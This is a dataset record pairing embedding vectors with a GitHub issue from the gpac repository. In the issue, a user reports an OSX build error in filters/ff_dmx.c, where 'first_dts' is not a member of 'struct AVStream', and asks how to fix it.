-0.007159587927162647, 0.006532278843224049, 0.01843612641096115, 0.017309224233031273, -0.019487902522087097, -0.0076892320066690445, -0.01918739452958107, -0.015378464013338089, -0.006697557866573334, -0.010848315432667732, -0.005119894165545702, -0.03939651697874069, 0.017744960263371468, -0.003974210005253553, 0.008128724060952663, 0.014206485822796822, 0.007576541975140572, -0.001409567310474813, -0.00946598220616579, -0.010465169325470924, 0.002909286879003048, 0.004466290585696697, -0.009075322188436985, -0.01205785758793354, -0.014063744805753231, 0.008602023124694824, 0.011975218541920185, -0.010074509307742119, 0.04877234622836113, 0.024010539054870605, 0.006994308903813362, 0.0009719535009935498, -0.008526896126568317, 0.008444257080554962, -0.005874918773770332, 0.0010508366394788027, -0.01547612901777029, 0.0031140076462179422, -0.002253805287182331, -0.011862528510391712, 0.025543125346302986, -0.003989235032349825, 0.005991365760564804, -0.003619235474616289, -0.01756465621292591, -0.014274099841713905, -0.012020294554531574, -0.009435931220650673, -0.005345274694263935, 0.02470170520246029, -0.007193394936621189, 0.0008409511065110564, 0.014589632861316204, 0.00791836902499199, -0.004594006109982729, 0.026324445381760597, -0.0057284217327833176, -0.05793781951069832, 0.008564460091292858, -0.011284051463007927, -0.0023232975509017706, 0.01727917417883873, -0.004485072568058968, 0.0021918255370110273, 0.006258065812289715, 0.014446891844272614, -0.0027759368531405926, -0.02395043708384037, 0.02199713885784149, -0.003758220234885812, 0.0005667381337843835, -0.008481820113956928, -0.0019495415035635233, 0.003677458968013525, 0.0007493902230635285, -0.0016030189581215382, 0.01475491188466549, -0.013267399743199348, 0.002665124600753188, 0.0024585258215665817, -0.007189638912677765, -0.0027609113603830338, 0.0014461916871368885, -0.026459673419594765, 0.011299076490104198, -0.01176486350595951, -0.014965266920626163, -0.004214615561068058, -0.010848315432667732, -0.013380090706050396, 0.003299946431070566, 0.018165670335292816, -0.01369562279433012, 0.000310367759084329, 0.02772180363535881, 0.007843242026865482, -0.019172370433807373, 0.011133797466754913, -0.010923442430794239, -0.0016264960868284106, -0.016377652063965797, -0.01489765290170908, -0.009300703182816505, -0.01307207066565752, -0.0010480193886905909, -0.0013137806672602892, -0.009000195190310478, -0.00847430806607008, -0.01682841219007969, -0.021305972710251808, -0.00026599597185850143, -0.014762423932552338, 0.0026613683439791203, -0.005356543697416782, -0.007163344416767359, -0.006430857814848423, -0.008354105055332184, 0.024085665121674538, 0.0071520754136145115, 0.012839176692068577, -0.013169735670089722, -0.006915425881743431, -0.01462719589471817, -0.0003357230743858963, -0.002197460038587451, 0.020209120586514473, 0.0008780449279583991, 0.01777501031756401, 0.010435118339955807, 0.014093795791268349, -0.010179687291383743, -0.014574606902897358, 0.0003530961403157562, -0.0347987525165081, -0.007606592494994402, -0.0029243123717606068, -0.016723234206438065, -0.005983852781355381, 0.02746637351810932, 0.005882431752979755, -0.017219072207808495, 0.024401197209954262, 0.007775628007948399, 0.013282425701618195, -0.01547612901777029, 0.006453395821154118, 0.003561012214049697, 0.00403055502101779, -0.00833156704902649, -0.007493902463465929, 0.01612222008407116, -0.0023702518083155155, 0.0075502474792301655, -0.023755107074975967, 0.0014922069385647774, 0.029194289818406105, 0.025377847254276276, 0.009308215230703354, -0.002802231116220355, 0.0064271013252437115, -0.0010508366394788027, 0.01682841219007969, -0.01058537233620882, -0.000848463736474514, 0.00857948511838913, 0.01935267448425293, -0.0004477090260479599, 0.010014408268034458, -0.028247691690921783, 0.04832158237695694, 0.00041366717778146267, -0.020149018615484238, -0.020644856616854668, -0.0049433461390435696, -0.01355288177728653, -0.007028115913271904, -0.008218876086175442, -0.025798557326197624, 0.01392100378870964, 0.010863341391086578, 0.02437114715576172, -0.007013090420514345, -0.0007883622893132269, 0.00661116186529398, 0.004470047075301409, 0.02660992741584778, -0.021771758794784546, 0.032965656369924545, 0.00489827012643218, 0.001001065131276846, -0.01881176047027111, 0.018992064520716667, -0.0049245646223425865, 0.00705441040918231, 0.0022030945401638746, -0.002409693319350481, 0.00857948511838913, -0.0027778148651123047, 0.00009613887959858403, 0.005874918773770332, -0.006675019860267639, 0.007234714925289154, 0.005822330247610807, -0.00025660512619651854, 0.0019457851303741336, -0.004113194532692432, 0.009375830180943012, 0.021531352773308754, 0.008113699033856392, -0.010269839316606522, -0.018406076356768608, 0.004391164053231478, 0.006802735384553671, 0.009894205257296562, -0.01031491532921791, -0.026008913293480873, -0.003482129191979766, 0.008324054069817066, 0.002774058608338237, -0.02171165682375431, 0.020524652674794197, -0.01794029027223587, -0.026790231466293335, 0.017835112288594246, 0.010495219379663467, 0.0027364951092749834, 0.02005886659026146, 0.01547612901777029, 0.015250748954713345, -0.013004456646740437, -0.00447380356490612, 0.029524847865104675 ]
null
null
null
null
null
null
null
null
null
[ "gpac", "gpac" ]
I am building GPAC on OSX. When running `make` in directory gpac_public: ``` cd ../gpac_public ./configure --extra-cflags=-Wno-deprecated make sudo make install ``` I encounter an error called "filters/ff_dmx.c:249:16: error: no member named 'first_dts' in 'struct AVStream'" I have already looked for `ff_dmx.c` and `libavformat/avformat.h` where "struct AVStream" is defined. I even include `libavformat/avformat.h` into `ff_dmx.c`. However, it does not solve the problem. Can anyone encounter this error? How to fix it?
GPAC Build error: no member named 'first_dts' in 'struct AVStream'
https://api.github.com/repos/gpac/gpac/issues/1866/comments
4
2021-07-29T14:23:48
2021-07-30T12:40:01Z
https://github.com/gpac/gpac/issues/1866
955,897,982
1,866
false
This is a GitHub Issue repo:gpac owner:gpac Title : GPAC Build error: no member named 'first_dts' in 'struct AVStream' Issue date: --- start body --- I am building GPAC on OSX. When running `make` in directory gpac_public: ``` cd ../gpac_public ./configure --extra-cflags=-Wno-deprecated make sudo make install ``` I encounter an error called "filters/ff_dmx.c:249:16: error: no member named 'first_dts' in 'struct AVStream'" I have already looked for `ff_dmx.c` and `libavformat/avformat.h` where "struct AVStream" is defined. I even include `libavformat/avformat.h` into `ff_dmx.c`. However, it does not solve the problem. Can anyone encounter this error? How to fix it? --- end body ---
705
[ -0.028175868093967438, 0.028705384582281113, -0.01720929704606533, 0.042528558522462845, 0.0030116268899291754, -0.007684960961341858, -0.035839926451444626, 0.05094509199261665, -0.011064114049077034, 0.023145457729697227, 0.0015275863697752357, 0.0032641924917697906, 0.001363854156807065, 0.01589943841099739, -0.005134919658303261, 0.05640747398138046, -0.005291684530675411, 0.02554221823811531, -0.00599538441747427, 0.0024124367628246546, 0.034195639193058014, -0.00764315715059638, 0.01532811764627695, 0.041553135961294174, 0.008019392378628254, 0.006221822462975979, -0.02909555472433567, 0.026489775627851486, -0.028621776029467583, -0.014227280393242836, 0.032662827521562576, 0.020442135632038116, -0.029959503561258316, 0.009350151754915714, 0.0329972580075264, 0.0036648137029260397, 0.02423236146569252, 0.08472269028425217, 0.026963552460074425, 0.007252987008541822, -0.04347611591219902, -0.031743139028549194, -0.06376497447490692, 0.004075885750353336, -0.010485826060175896, 0.02545861154794693, 0.007287823595106602, 0.03073984384536743, -0.02084624022245407, -0.009719420224428177, 0.016428954899311066, 0.021083129569888115, -0.022490529343485832, -0.011029277928173542, -0.0279111098498106, -0.012771109119057655, 0.03809734061360359, -0.008353824727237225, -0.01679125614464283, 0.0291791632771492, 0.02258807234466076, 0.012582991272211075, 0.0075107780285179615, 0.017320772632956505, -0.010680911131203175, 0.02254626899957657, -0.029680810868740082, 0.0655486062169075, -0.006814045365899801, 0.018031440675258636, -0.006294979248195887, -0.023911863565444946, 0.005166272632777691, 0.023145457729697227, 0.010158361867070198, -0.07769962400197983, 0.024302033707499504, 0.038208816200494766, -0.0281201284378767, 0.0123670045286417, -0.037066176533699036, -0.013495711609721184, -0.05562713369727135, 0.007266921456903219, 0.005096599459648132, 0.01982901059091091, -0.024761877954006195, -0.048186030238866806, -0.011516990140080452, -0.003001175820827484, -0.002304443158209324, 0.047767989337444305, 0.060755085200071335, -0.002104132669046521, -0.023800386115908623, 0.04381055012345314, -0.013614155352115631, -0.0075107780285179615, -0.010109590366482735, -0.030544759705662727, -0.051279522478580475, -0.01691666804254055, 0.05735503137111664, -0.009607942774891853, 0.03349890559911728, 0.007852177135646343, 0.03464154526591301, -0.002161612967029214, 0.02105526067316532, 0.11242477595806122, 0.001245409599505365, 0.025848781690001488, -0.022309379652142525, 0.008263248950242996, -0.006180018652230501, 0.050554919987916946, -0.03745634853839874, -0.026280755177140236, 0.014965817332267761, 0.01408096682280302, -0.013725632801651955, -0.028705384582281113, -0.049718841910362244, 0.012311265803873539, -0.014283019118010998, 0.034780893474817276, 0.014826470986008644, -0.013035867363214493, -0.023075785487890244, 0.01928555965423584, -0.04300233721733093, -0.025890585035085678, 0.016219936311244965, -0.008123902603983879, 0.011788716539740562, -0.009182936511933804, -0.019174082204699516, 0.043030206114053726, -0.015258444473147392, 0.015676483511924744, -0.006326332222670317, -0.012666599825024605, 0.036982569843530655, 0.0010503244120627642, 0.006573672406375408, -0.03252347931265831, 0.006876751314848661, -0.0017731845146045089, -0.006521417293697596, -0.00653535220772028, -0.025723369792103767, -0.04771225154399872, 0.028984077274799347, -0.011301003396511078, 0.018895389512181282, 0.0028357019182294607, -0.0069673266261816025, -0.010158361867070198, -0.0019247239688411355, -0.039992451667785645, -0.010694845579564571, -0.02859390713274479, 0.006932489573955536, -0.011830519884824753, -0.006960358936339617, -0.0033164473716169596, 0.014742862433195114, 0.0029349862597882748, -0.024427445605397224, 0.005918743554502726, -0.014659254811704159, 0.024455316364765167, -0.013607188127934933, 0.027158638462424278, -0.03957441449165344, -0.011140754446387291, 0.03634157404303551, 0.05172543227672577, -0.021501168608665466, -0.01635928265750408, -0.014798601157963276, 0.021542973816394806, 0.023661039769649506, -0.010367381386458874, 0.002363665495067835, -0.02317332848906517, 0.029875895008444786, -0.03135296702384949, 0.017738813534379005, -0.023075785487890244, 0.0036578462459146976, 0.021250344812870026, -0.0012898263521492481, -0.003354767570272088, 0.03536614775657654, -0.01606665551662445, -0.05175330117344856, -0.01741831563413143, -0.038376033306121826, -0.003133554942905903, 0.004135108087211847, -0.02761848270893097, 0.008353824727237225, 0.009294413030147552, -0.03455793857574463, 0.009747290052473545, -0.025695499032735825, 0.04918932542204857, 0.01383014302700758, -0.02352169342339039, -0.020609350875020027, -0.021041326224803925, -0.000997198629193008, -0.0043476116843521595, 0.014701059088110924, -0.0018132467521354556, -0.0006431713118217885, 0.02867751568555832, 0.007273888681083918, -0.023479890078306198, 0.05035983398556709, -0.030293935909867287, -0.004117690026760101, 0.03458580747246742, -0.037790779024362564, -0.021626580506563187, -0.015146967954933643, -0.018073244020342827, -0.021835600957274437, 0.013941620476543903, 0.003469728631898761, 0.028900470584630966, -0.007601352874189615, -0.002037942875176668, 0.017195360735058784, -0.004086337052285671, -0.0066398619674146175, 0.01641502045094967, -0.0325792171061039, -0.0052847168408334255, 0.00868825614452362, 0.01610845886170864, 0.011962899006903172, -0.0077546341344714165, 0.02545861154794693, 0.054623838514089584, -0.002447273349389434, 0.020288854837417603, -0.03439072147011757, -0.00488409586250782, 0.027716023847460747, 0.007733732461929321, 0.006657280493527651, 0.012415776029229164, -0.014617450535297394, 0.02373071387410164, -0.012220690958201885, -0.00764315715059638, -0.016345348209142685, -0.05175330117344856, 0.0042396183125674725, -0.003457535756751895, -0.01720929704606533, -0.007197248283773661, -0.030516888946294785, -0.0001814770803321153, -0.0009109779493883252, -0.003562045516446233, 0.02398153766989708, -0.012541187927126884, 0.0018027956830337644, 0.010130492970347404, -0.02545861154794693, 0.012269461527466774, 0.02076263353228569, -0.011893225833773613, -0.005469351075589657, -0.027688154950737953, 0.010102623142302036, 0.019132278859615326, -0.034697286784648895, 0.01463138498365879, -0.032802172005176544, -0.0008025488932617009, -0.012039540335536003, 0.018449479714035988, -0.006141697987914085, -0.036815352737903595, 0.02190527506172657, 0.019689664244651794, 0.03547762706875801, 0.023535627871751785, -0.05858128145337105, 0.002199933398514986, 0.0009919730946421623, 0.00811693537980318, 0.00558082852512598, -0.004361546132713556, -0.0006854107487015426, -0.011071081273257732, 0.005215043667703867, 0.013676861301064491, 0.016568301245570183, -0.021793797612190247, -0.04347611591219902, 0.028788993135094643, -0.014547777362167835, 0.00009427663462702185, 0.047266341745853424, -0.035589102655649185, 0.017878159880638123, -0.02435777336359024, -0.006336783524602652, 0.006594574544578791, 0.003476695856079459, -0.0021198091562837362, -0.004870160948485136, -0.01564861461520195, -0.0351153239607811, -0.009607942774891853, -0.00018506961350794882, -0.002863571047782898, -0.05573861300945282, -0.02127821557223797, 0.012889553792774677, -0.014046129770576954, -0.027674220502376556, -0.014519908465445042, -0.04461875930428505, -0.001835890463553369, -0.0032694179099053144, 0.006455227732658386, 0.040410492569208145, -0.00925957690924406, 0.006605025380849838, -0.031436577439308167, -0.002990724751725793, -0.017474055290222168, 0.0021546457428485155, -0.02516598254442215, -0.013286691159009933, 0.012408807873725891, 0.0018846618477255106, -0.0074550393037498, -0.023103654384613037, 0.008360791951417923, -0.0021511621307581663, 0.015077294781804085, 0.033721860498189926, -0.019689664244651794, 0.0008352082804776728, 0.009977211244404316, 0.04500892758369446, -0.019048670306801796, 0.02364710532128811, -0.00006825802847743034, -0.010896898806095123, -0.053007420152425766, 0.0025082374922931194, -0.011816585436463356, -0.005288200918585062, -0.021765926852822304, 0.0363694429397583, 0.035756319761276245, 0.002649325877428055, 0.01814291812479496, -0.013328495435416698, -0.011468219570815563, 0.02088804543018341, 0.005859521683305502, -0.013579319231212139, 0.04347611591219902, -0.028566038236021996, 0.02182166650891304, -0.029597202315926552, -0.013725632801651955, 0.021459365263581276, -0.005699273198843002, -0.028984077274799347, -0.008653419092297554, -0.055125486105680466, -0.006274077575653791, 0.03388907387852669, -0.028984077274799347, 0.02545861154794693, -0.007615287788212299, -0.002985499333590269, 0.04105148836970329, -0.041636742651462555, -0.054874662309885025, -0.029569333419203758, 0.009419824928045273, -0.0007690186612308025, -0.044981058686971664, -0.02803652174770832, -0.013851044699549675, -0.0009127197554334998, -0.044563017785549164, 0.04300233721733093, 0.00004455278758541681, 0.046207308769226074, -0.004291872959583998, 0.006713018752634525, -0.005977965891361237, -0.020483938977122307, 0.028956208378076553, -0.009371054358780384, 0.0030046594329178333, 0.039769500494003296, 0.031910356134176254, 0.013753502629697323, -0.019759338349103928, -0.04994179680943489, -0.002976790303364396, -0.004560115281492472, 0.024469250813126564, -0.002395018469542265, 0.0010755810653790832, -0.020525744184851646, 0.03319234400987625, 0.014422365464270115, 0.008089065551757812, -0.010221067816019058, 0.020121637731790543, 0.0456777922809124, 0.04985818639397621, -0.026420101523399353, 0.04080066457390785, -0.015216641128063202, -0.011321905069053173, 0.04247282072901726, -0.024009406566619873, 0.015495333820581436, 0.000281958986306563, 0.0011609307257458568, -0.011523958295583725, 0.00272770831361413, -0.053899236023426056, 0.007691928185522556, 0.006556254345923662, -0.059528835117816925, 0.013983423821628094, -0.00007952549640322104, 0.002816541586071253, 0.04592861607670784, -0.037790779024362564, -0.053313981741666794, -0.036146488040685654, 0.0006296721403487027, -0.023716779425740242, 0.0034226991701871157, 0.023117588832974434, 0.0003555513685569167, -0.015787960961461067, -0.008137837052345276, -0.002673711394891143, 0.0045566316694021225, 0.010541564784944057, 0.03712191432714462, -0.03475302457809448, -0.013711698353290558, 0.013864979147911072, 0.008667354471981525, 0.024580728262662888, 0.042528558522462845, 0.028106193989515305, -0.01974540390074253, -0.019856879487633705, -0.01516090240329504, 0.0070927380584180355, 0.00418736319988966, 0.01758553273975849, 0.03845963999629021, 0.02579304203391075, -0.010325578041374683, 0.04110722616314888, -0.021765926852822304, -0.019299494102597237, 0.013175214640796185, -0.046708956360816956, 0.01401826087385416, -0.00364739540964365, 0.005148854106664658, 0.024901224300265312, -0.0414416566491127, -0.0010006822412833571, -0.014575647190213203, 0.028566038236021996, -0.04684830084443092, 0.020024096593260765, 0.034112028777599335, 0.03260708600282669, 0.01826833002269268, -0.02038639783859253, -0.002078005112707615, 0.032077569514513016, -0.00650399923324585, 0.01594124361872673, 0.02063722163438797, -0.009545236825942993, -0.00996327679604292, 0.013600220903754234, 0.012924390845000744, -0.017111754044890404, 0.018742108717560768, -0.022406920790672302, -0.002419403987005353, -0.006085959728807211, -0.015049424953758717, 0.0032258720602840185, -0.028384888544678688, 0.0095173679292202, -0.010736649855971336, -0.03843177109956741, -0.01313341036438942, -0.005974482279270887, 0.015551072545349598, 0.006486580707132816, -0.0036578462459146976, -0.002938469871878624, -0.001130448654294014, -0.019856879487633705, -0.014492038637399673, 0.0024803681299090385, -0.00624969182536006, 0.018923258408904076, 0.00012650052667595446, -0.01167027186602354, 0.021640514954924583, 0.0033808951266109943, -0.02626682072877884, -0.010130492970347404, -0.0016390635864809155, 0.03740060701966286, -0.01835193857550621, 0.018853584304451942, -0.0019090474816039205, 0.04322529211640358, 0.01066000945866108, -0.02377251721918583, -0.03570058196783066, 0.026698794215917587, -0.023619236424565315, 0.005828168708831072, -0.015969112515449524, -0.009921472519636154, 0.0016399344895035028, 0.025277459993958473, -0.011551827192306519, 0.0006344621651805937, 0.0025204303674399853, -0.017195360735058784, -0.009141132235527039, 0.015592876821756363, 0.008019392378628254, -0.007406267803162336, -0.007726764772087336, 0.028872599825263023, 0.012067409232258797, 0.03734486922621727, -0.022225771099328995, 0.0030708489939570427, 0.004887579474598169, -0.01822652667760849, -0.014087934046983719, 0.007712830323725939, 0.02042820118367672, 0.017836354672908783, -0.04570566117763519, 0.008932112716138363, -0.001534553593955934, -0.03519893437623978, 0.039992451667785645, 0.026043865829706192, 0.0015911632217466831, 0.01974540390074253, 0.013035867363214493, -0.03377759829163551, -0.014310888014733791, -0.020372461527585983, 0.02427416481077671, -0.01654043234884739, -0.005671403836458921, -0.009099327959120274, -0.015578941442072392, 0.012631762772798538, -0.017404381185770035, -0.002431596862152219, -0.04224986582994461, -0.011551827192306519, -0.009621878154575825, 0.011405513621866703, -0.00437548104673624, -0.010332545265555382, 0.04308594763278961, -0.017961766570806503, -0.008207510225474834, 0.01606665551662445, 0.0321333110332489, 0.004445154219865799, 0.012785043567419052, 0.024692203849554062, -0.04004819318652153, -0.02359136752784252, -0.022615941241383553, 0.017613401636481285, -0.0006327203009277582, -0.016303543001413345, -0.03531040996313095, 0.005936162080615759, -0.011029277928173542, 0.025221722200512886, 0.059194404631853104, -0.007315692491829395, 0.009761224500834942, 0.035839926451444626, -0.006270593963563442, 0.03628583624958992, -0.001997880870476365, 0.03818094730377197, 0.011475186794996262, 0.00261623109690845, 0.01541172619909048, -0.020079834386706352, 0.023493824526667595, 0.04110722616314888, 0.019564252346754074, -0.01801750622689724, -0.02313152328133583, -0.04553844407200813, -0.004277938511222601, 0.01433875784277916, -0.03188248723745346, -0.017989637330174446, -0.029959503561258316, -0.00020553612557705492, 0.03057262860238552, -0.027256181463599205, -0.022406920790672302, -0.0013490485725924373, -0.0507500059902668, -0.022685615345835686, -0.006939457263797522, 0.01700027659535408, -0.02105526067316532, -0.0036613300908356905, 0.0035341763868927956, 0.003894735360518098, -0.005539024714380503, 0.028357017785310745, -0.016052719205617905, -0.028816862031817436, 0.018937192857265472, 0.017864225432276726, 0.008221445605158806, -0.04960736259818077, 0.0215708427131176, 0.019898684695363045, 0.020623285323381424, -0.028900470584630966, -0.042946599423885345, -0.023925798013806343, 0.0016486436361446977, -0.03703830763697624, 0.026643056422472, 0.01755766198039055, 0.023061851039528847, 0.009169001132249832, 0.007012614049017429, 0.021765926852822304, 0.018574891611933708, -0.019522449001669884, 0.018115049228072166, -0.014547777362167835, -0.016178131103515625, -0.011189525946974754, -0.001954335020855069, 0.02423236146569252, -0.0010337770218029618, 0.007608320564031601, -0.001947367680259049, -0.011955931782722473, 0.007775536272674799, 0.043364640325307846, 0.004542696755379438, 0.011210428550839424, 0.00418736319988966, -0.042528558522462845, 0.004365030210465193, 0.0047238473780453205, 0.021375756710767746, 0.008764896541833878, 0.01594124361872673, 0.07374218106269836, -0.034362852573394775, -0.013530547730624676, 0.023243000730872154, 0.01421334594488144, -0.014352692291140556, -0.020205246284604073, -0.01027680654078722, -0.0008743994403630495, -0.007141509559005499, -0.027088964357972145, 0.0050269258208572865, 0.01974540390074253, -0.006981261074542999, -0.00894604716449976, -0.009468596428632736, 0.020274920389056206, 0.0044381869956851006, 0.017278969287872314, -0.022824961692094803, -0.010980506427586079, 0.006521417293697596, 0.011301003396511078, -0.020038031041622162, -0.0062636262737214565, -0.028064390644431114, 0.0007864369545131922, -0.001879436313174665, -0.023549562320113182, -0.006702567916363478, -0.014659254811704159, 0.014924013055860996, 0.008528007194399834, 0.014505974017083645, 0.010673943907022476, -0.01192806288599968, 0.010945669375360012, -0.02173805795609951, -0.03377759829163551, 0.05091722309589386, 0.013300626538693905, -0.026670925319194794, -0.013662926852703094, -0.001288955332711339, 0.016693713143467903, 0.029848026111721992, 0.0007215537480078638, -0.002435080474242568, 0.027674220502376556, -0.010450989939272404, -0.013307593762874603, -0.005960547830909491, -0.009419824928045273, 0.0022539300844073296, 0.0047238473780453205, -0.05615665018558502, -0.003922604955732822, 0.003894735360518098, 0.0019578186329454184, -0.000021827327145729214, -0.03023819625377655, 0.004337160848081112, -0.003100460162386298, 0.01924375630915165, -0.018686369061470032, -0.004034081939607859, -0.005479802377521992, 0.002992466790601611, -0.036564528942108154, -0.002335796132683754, -0.006416907534003258, 0.0020954234059900045, -0.005141886882483959, 0.0036125588230788708, -0.003208453767001629, 0.010332545265555382, 0.0033199309837073088, -0.015105163678526878, 0.004901513922959566, -0.04746142774820328, -0.010917800478637218, 0.01683306135237217, -0.005242913030087948, 0.004236134234815836, 0.008172674104571342, -0.030516888946294785, 0.016401086002588272, -0.04420071840286255, 0.012736272998154163, -0.05303528904914856, 0.008263248950242996, 0.03243987262248993, -0.04068918526172638, 0.026113539934158325, 0.02381432242691517, 0.0007907915278337896, -0.0030638817697763443, 0.010778454132378101, -0.012764141894876957, 0.05063852667808533, -0.02676846832036972, 0.011078049428761005, -0.007026548497378826, -0.007047450635582209, 0.028900470584630966, -0.00444167060777545, -0.02203068695962429, -0.0025831363163888454, 0.0074202027171850204, -0.0003590350388549268, -0.04545483738183975, -0.016679778695106506, -0.002447273349389434, -0.02127821557223797, -0.023159392178058624, -0.02892833948135376, 0.012464546598494053, -0.010193198919296265, -0.013014965690672398, 0.02288069948554039, -0.0007498585036955774, -0.006862816400825977, -0.0034174735192209482, -0.016888799145817757, -0.029374247416853905, -0.026963552460074425, 0.027925044298171997, -0.02304791659116745, 0.008973916061222553, 0.006751339416950941, -0.009447694756090641, 0.0054763187654316425, -0.055209092795848846, 0.00850013829767704, -0.0003272466128692031, 0.01725110039114952, -0.014575647190213203, -0.0298201572149992, 0.005166272632777691, -0.015829766169190407, 0.030628366395831108, -0.03726126253604889, 0.010680911131203175, -0.017864225432276726, 0.010039917193353176, -0.005215043667703867, 0.0190347358584404, -0.013321528211236, -0.007531679701060057, -0.04021540656685829, -0.04361546412110329, -0.0019055637530982494, 0.0006240111542865634, -0.008040294982492924, -0.006033704616129398, -0.004392899107187986, -0.0011539633851498365, 0.02051180973649025, 0.025695499032735825, 0.026921749114990234, 0.00536135770380497, -0.011635434813797474, 0.0145895816385746, -0.02190527506172657, -0.013328495435416698, 0.03335955739021301, -0.03269069641828537, 0.029680810868740082, 0.028357017785310745, -0.025235656648874283, 0.008534974418580532, -0.0017810227582231164, 0.014478104189038277, -0.00233057071454823, -0.020539678633213043, 0.023758582770824432, 0.004389415495097637, -0.019229819998145103, -0.008144804276525974, 0.0014143672306090593, -0.013084638863801956, -0.005399677902460098, -0.0033634768333286047, 0.014241214841604233, -0.03756782412528992, -0.02431597001850605, 0.007197248283773661, 0.02026098594069481, 0.03274643421173096, -0.034446462988853455, -0.010820257477462292, 0.0130079984664917, -0.011196493171155453, -0.018128983676433563, -0.010820257477462292, -0.011523958295583725, 0.004079369828104973, 0.004713396076112986, 0.0056121814996004105, 0.0045148273929953575, 0.006855849176645279, -0.005974482279270887, 0.017474055290222168, -0.0003522854531183839, -0.031185753643512726, -0.009649747051298618, -0.02123641036450863, -0.00615214928984642, 0.00875096209347248, 0.00817964132875204, 0.018115049228072166, 0.013906783424317837, -0.017906028777360916, 0.02452498860657215, 0.024037275463342667, -0.016763387247920036, -0.011126819998025894, 0.01471499353647232, 0.011746912263333797, -0.01872817426919937, -0.029207032173871994, -0.028022587299346924, 0.005037377122789621, -0.0042570363730192184, 0.008541942574083805, 0.011726010590791702, 0.03912850469350815, -0.019633926451206207, 0.025096310302615166, 0.004776102025061846, 0.02820373699069023, 0.024678269401192665, -0.009078426286578178, -0.016303543001413345, 0.00009166388917947188, 0.02402334101498127, 0.03082345239818096, 0.003929572179913521, 0.0038355132564902306, 0.020358527079224586, -0.01615026220679283, 0.006716502830386162, -0.007371431216597557, 0.0011487379670143127, -0.007096222136169672, 0.007005646824836731, -0.02423236146569252, 0.02651764452457428, 0.008681288920342922, -0.006131247151643038, -0.0056017301976680756, 0.01471499353647232, 0.014352692291140556, -0.009280478581786156, 0.017655204981565475, -0.04002032428979874, -0.01446416974067688, -0.004236134234815836, -0.03937932848930359, -0.026531578972935677, -0.01759946718811989, -0.02668485976755619, 0.009719420224428177, -0.007719797547906637, -0.014687123708426952, 0.037623561918735504, -0.002640616614371538, 0.011057146824896336, 0.03447433188557625, -0.007608320564031601, -0.01878391206264496, 0.017710942775011063, 0.01826833002269268, 0.011816585436463356, -0.009398923255503178, -0.006678182166069746, -0.022128228098154068, 0.02232331410050392, -0.006814045365899801, -0.01860276237130165, 0.018923258408904076, 0.004434703383594751, 0.04534336179494858, 0.0018445996101945639, -0.005239429417997599, -0.020734762772917747, -0.021222475916147232, -0.026378298178315163, 0.010924767702817917, 0.016819125041365623, -0.017710942775011063, -0.0077964384108781815, -0.01033951248973608, 0.010012048296630383, 0.0060267373919487, 0.018881455063819885, 0.001739218831062317, -0.022225771099328995, 0.034697286784648895, 0.04166461154818535, -0.046374525874853134, 0.02706109546124935, 0.015746157616376877, 0.0022103842347860336, 0.0016939311753958464, -0.00450437655672431, -0.011558794416487217, 0.00780340563505888, -0.005984933581203222, -0.01984294503927231, -0.020316723734140396, -0.0171256884932518, 0.022365117445588112, 0.007308725267648697, 0.004957252647727728, -0.03138083964586258, 0.009510400705039501, -0.0007089254795573652, -0.01941097155213356, 0.0061556329019367695, -0.013746535405516624, 0.006869783625006676, -0.0012070892844349146, -0.015397791750729084, 0.028217671439051628, 0.011496088467538357, 0.015258444473147392, -0.011398546397686005, -0.007496843114495277, 0.014840405434370041, 0.01992655359208584, 0.007887013256549835, 0.015314183197915554, 0.00290189147926867, 0.012631762772798538, 0.010095655918121338, 0.027423396706581116, -0.009907538071274757, 0.013795305974781513, 0.004072402138262987, 0.011015343479812145, 0.0034645029809325933, -0.013690796680748463, -0.00321890483610332, -0.016526497900485992, -0.003461019368842244, 0.011064114049077034, 0.030934929847717285, 0.0014065289869904518, -0.03455793857574463, -0.030043112114071846, -0.0068175289779901505, 0.0067757247015833855, 0.02774389460682869, 0.00010369341180194169, -0.02304791659116745, -0.008451366797089577, -0.005093115381896496, 0.007949719205498695, 0.03519893437623978, -0.011914128437638283, 0.008632517419755459, 0.006301946938037872, 0.0030203359201550484, 0.00024080822186078876, 0.002624940127134323, 0.001329888473264873, -0.0036961666774004698, -0.01793389767408371, 0.034446462988853455, -0.006674698553979397, -0.013377266936004162, 0.016178131103515625, -0.01729290373623371, 0.026211081072688103, 0.004730814602226019, 0.021682320162653923, -0.022211836650967598, 0.004403350409120321, -0.002046652138233185, -0.019815076142549515, 0.013983423821628094, -0.012680534273386002, 0.010074754245579243, -0.012387906201183796, -0.008918177336454391, -0.0071833133697509766, -0.019689664244651794, -0.012353070080280304, 0.012234625406563282, 0.002863571047782898, -0.03489236906170845, 0.004493925720453262, 0.006448260508477688, -0.018282264471054077, -0.01186535693705082, 0.005033893510699272, -0.01700027659535408, -0.020038031041622162, 0.003016852308064699, -0.04166461154818535, -0.03160379081964493, 0.030098849907517433, 0.020874109119176865, 0.07268314808607101, 0.03592353314161301, -0.0073783984407782555, -0.005918743554502726, -0.00041673320811241865, 0.0026667441707104445, -0.0006296721403487027, -0.014937947504222393, -0.021807732060551643, 0.0312972292304039, -0.006545803043991327, 0.0013969489373266697, 0.01847735047340393, -0.00574107700958848, -0.017906028777360916, -0.019815076142549515, 0.011753879487514496, -0.015174836851656437, -0.009482530876994133, 0.00111825589556247, -0.013021932914853096, 0.01876997761428356, 0.011064114049077034, -0.03023819625377655, -0.002335796132683754, -0.0070160976611077785, -0.005556442774832249, -0.013502678833901882, -0.007385366130620241, 0.0001632967178011313, -0.011022310703992844, -0.0056435344740748405, -0.005162789020687342, 0.00111825589556247, 0.012896521016955376, 0.019982291385531425, 0.015355987474322319, -0.014394496567547321, -0.004462572745978832, -0.0042709712870419025, 0.016247805207967758, -0.008618582971394062, -0.0001892064610728994, 0.017710942775011063, 0.0025587505660951138, -0.04414498060941696, 0.019174082204699516, 0.01635928265750408, 0.030377542600035667, -0.0019926554523408413, -0.001506684347987175, -0.03352677449584007, 0.014979751780629158, 0.05409432202577591, 0.0007389720412902534, -0.0009397181565873325, -0.014025228098034859, 0.004999056458473206, -0.009412857703864574, -0.0066503132693469524, 0.02051180973649025, 0.0010050368728116155, 0.01957818679511547, 0.02828734554350376, 0.00501299137249589, -0.005653985310345888, -0.012137082405388355, 0.020330658182501793, 0.0120534747838974, 0.016275674104690552, 0.015676483511924744, 0.012805946171283722, -0.011377643793821335, 0.0026388748083263636, -0.012966194190084934, 0.021933143958449364, -0.011468219570815563, 0.0075107780285179615, -0.017906028777360916, 0.0037170685827732086, 0.020274920389056206, 0.009796060621738434, -0.003873833455145359, 0.007531679701060057, -0.026043865829706192, 0.007524712476879358, -0.0011644144542515278, 